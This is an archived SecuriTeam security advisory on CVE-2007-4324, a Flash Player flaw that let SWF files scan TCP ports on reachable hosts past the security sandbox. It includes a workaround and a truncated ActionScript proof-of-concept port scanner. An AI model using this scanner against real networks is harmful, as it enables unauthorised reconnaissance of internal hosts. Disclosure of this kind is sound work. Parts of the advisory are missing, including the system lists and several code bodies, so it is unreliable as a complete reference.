The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
SUMMARY
Due to a design flaw in ActionScript 3 socket handling, compiled Flash
movies are able to scan for open TCP ports on any host reachable from the
host running the SWF, bypassing the Flash Player Security Sandbox Model
and without the need to rebind DNS.
DETAILS
Vulnerable Systems:
Workaround:
The following instructions reference the mms.cfg configuration file. For
a general introduction to mms.cfg, see the Adobe Flash Player
Administration Guide.
To disable ActionScript socket functionality:
Ensure that Flash Player 9.0.115.0, or later, is installed. Visit the
Adobe Flash Player Download Center to obtain the latest version, or visit
the Adobe Flash Product page to determine the version currently installed.
Find the location of the file mms.cfg on your system(s). This file may
already exist, or you may need to create it. You will most likely need
administrative access to create or edit this file. mms.cfg is located at:
CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4324>
CVE-2007-4324
Exploit:
/**
the application will check if the port is reachable from the
host the swf runs on and then calls the javascript function "reportResult"
with the port number and the ports state (true or false)
public class Main extends flash.display.Sprite
{
// textField for status viewing
protected var tf:TextField;
// the socket that (tries) connects
protected var socket:Socket;
// timer for detecting not answering policy-requests
protected var timer:Timer;
// the host to probe
protected var host:String;
// the port to probe
protected var port:Number;
// Main Entry Point
public function Main():void
{
// setup status textfield
tf = new TextField();
tf.width = 600;
tf.height = 300;
// get port from parameters
port = parseInt(this.loaderInfo.parameters['port']);
if (isNaN(port)) {
port = 80;
}
// get host from parameters
host = this.loaderInfo.parameters['host'];
if (host == null) {
host = '127.0.0.1';
}
addChild(tf);
// setup the timer
// if a port is closed an the flash plugin is not able to write the
"<policy-file-request/>"-XML to the socket it will immediately fire an
SecurityErrorEvent. If the SecurityErrorEvent is not fired within 2
seconds we assume that flash was able to write the xml to the socket an is
waiting for a reply -> the port is open. The timer can be reduced a lot to
make scanning even faster.
timer = new Timer(2000, 1);
timer.addEventListener(TimerEvent.TIMER, onTimer);
//tf.appendText('interface: '+ExternalInterface.available);
//ExternalInterface.call('alert', 'test');
probe();
}
protected function probe():void
{
// show some info text
tf.appendText('probe host: '+host+' port: '+port);
// setup socket an event listeners
socket = new Socket();
// listen to the badly implemented security error
socket.addEventListener(SecurityErrorEvent.SECURITY_ERROR,
onSecurityError);
// listen to sucessfull connects (should in fact never happen)
socket.addEventListener(Event.CONNECT, onConnect);
// listen to IO Errors that will also never occur
socket.addEventListener(IOErrorEvent.IO_ERROR, onIOError);
timer.reset();
timer.start();
// try to connect
socket.connect(host, port);
}
/**
/**
/**
/**
/**
/**
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]> David
Neu.
The original article can be found at: <http://scan.flashsec.org/>
http://scan.flashsec.org/
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.